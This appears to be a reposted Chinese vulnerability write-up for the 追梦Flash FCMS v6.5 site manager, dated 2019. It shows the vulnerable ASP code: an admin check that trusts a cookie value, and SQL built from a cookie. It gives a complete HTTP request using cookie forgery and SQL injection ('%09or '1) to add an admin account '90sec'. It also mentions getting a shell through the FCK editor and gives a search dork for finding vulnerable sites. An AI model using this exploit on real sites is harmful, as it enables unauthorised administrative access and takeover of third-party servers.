追梦Flash网站管理系统FCMS v6.5 漏洞

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2019年12月31日21:18:02评论393 views字数 664阅读2分12秒阅读模式
摘要

Author:roker
xmlEditor/adminadd.asp
[php]

<%
if request.cookies("key")<>"super" then
response.Write("

Author:roker
xmlEditor/adminadd.asp
[php]

<%
if request.cookies("key")<>"super" then
response.Write("

")
Response.End
end if
%>
chkuser.asp
<%
set urs=server.createobject("adodb.recordset")
sql="select * from xmlAdmin where adminName='"&Request.cookies("adminName")&"'"
urs.open sql,conn,1,3
if urs.bof or urs.eof then
response.redirect "login.asp"
response.end
end if
urs.close
set urs=nothing
%>[/php]
提交
[php]
Host: xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://xxx/xmlEditor/adminadd.asp
Cookie: key=super;adminName='%09or '1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

adminName=90sec&OSKEY=videos&newPwd=90sec&newPwd2=90sec&fullname=90sec&email=90sec%40qq.com[/php]
添加账号密码为90sec的用户 = =
后台 fck编辑器 拿shell
关键字。。
inurl:"server.asp?flowNo="

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日21:18:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   追梦Flash网站管理系统FCMS v6.5 漏洞https://cn-sec.com/archives/75289.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息